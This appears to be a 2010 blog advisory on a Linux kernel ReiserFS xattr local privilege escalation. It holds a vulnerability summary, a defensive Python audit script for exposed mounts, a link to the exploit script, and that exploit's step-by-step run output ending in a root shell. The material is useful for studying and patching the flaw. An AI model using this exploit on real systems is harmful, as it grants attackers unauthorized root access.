2.6.34-rc3 2010 local root exploit

Saturday, 21 August 2010

Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation
Jon Oberheide
http://jon.oberheide.org

Information:

https://bugzilla.redhat.com/show_bug.cgi?id=568041

The kernel allows processes to access the internal ".reiserfs_priv"
directory at the top of a reiserfs filesystem which is used to store
xattrs. Permissions are not enforced in that tree, so unprivileged
users can view and potentially modify the xattrs on arbitrary files.
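The two preconditions the advisory names (a reiserfs mount with user_xattr, and a .reiserfs_priv tree readable by an unprivileged user) can be audited from the defender's side. The script below is an added example, not the advisory author's team-edward.py: it parses /proc/mounts and reports whether the private xattr directory is listable by the current user; the sample mount table embedded in it is constructed for illustration.

```python
"""Audit a host for the reiserfs .reiserfs_priv exposure (added example)."""
import os
import sys

PRIV_DIR = ".reiserfs_priv"  # internal xattr storage tree named in the advisory

# Constructed sample of /proc/mounts: device mountpoint fstype options dump pass
SAMPLE_MOUNTS = (
    "/dev/sda1 / reiserfs rw,relatime,user_xattr 0 0\n"
    "/dev/sdb1 /mnt/data\\040old reiserfs rw,noatime 0 0\n"
    "/dev/sdc1 /home reiserfs rw,user_xattr,acl 0 0\n"
    "tmpfs /tmp tmpfs rw 0 0\n"
)


def unescape_mount_field(field):
    """Decode the octal escapes /proc/mounts uses, e.g. \\040 for a space."""
    out, i = [], 0
    while i < len(field):
        octal = field[i + 1:i + 4]
        if field[i] == "\\" and len(octal) == 3 and octal.isdigit():
            out.append(chr(int(octal, 8)))
            i += 4
        else:
            out.append(field[i])
            i += 1
    return "".join(out)


def exposed_reiserfs_mounts(mounts_text):
    """Mount points of reiserfs filesystems mounted with the user_xattr option."""
    hits = []
    for line in mounts_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed or truncated line; skip rather than guess
        mountpoint, fstype, options = parts[1], parts[2], parts[3].split(",")
        if fstype == "reiserfs" and "user_xattr" in options:
            hits.append(unescape_mount_field(mountpoint))
    return hits


def private_tree_readable(mountpoint):
    """True if this (unprivileged) process can list <mount>/.reiserfs_priv/xattrs.

    On a kernel without the bug the listing fails for non-root users, so a
    True result from a normal user account indicates the host is exposed.
    """
    try:
        os.listdir(os.path.join(mountpoint, PRIV_DIR, "xattrs"))
        return True
    except OSError:
        return False


if __name__ == "__main__":
    with open("/proc/mounts") as f:
        mounts = exposed_reiserfs_mounts(f.read())
    for mnt in mounts:
        state = "EXPOSED" if private_tree_readable(mnt) else "not readable (ok)"
        print("%s: private xattr tree %s" % (mnt, state))
    sys.exit(0)
```

Run it as a regular user; a mount reported as EXPOSED means the private xattr tree is browsable without privilege and the kernel should be updated past 2.6.34-rc3.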

Usage:

$ python team-edward.py
[+] checking for reiserfs mount with user_xattr mount option
[+] checking for private xattrs directory at /.reiserfs_priv/xattrs
[+] preparing shell in /tmp
[+] capturing pre-shell snapshot of private xattrs directory
[+] compiling shell in /tmp
[+] setting dummy xattr to get reiserfs object id
[+] capturing post-shell snapshot of private xattrs directory
[+] found 1 new object ids
[+] setting cap_setuid/cap_setgid capabilities on object id 192B.1468
[+] spawning setuid shell...
# id
uid=0(root) gid=0(root) groups=4(adm), ...

Notes:

Obviously requires a ReiserFS filesystem mounted with extended attributes.
Tested on Ubuntu Jaunty 9.10.

http://jon.oberheide.org/files/team-edward.py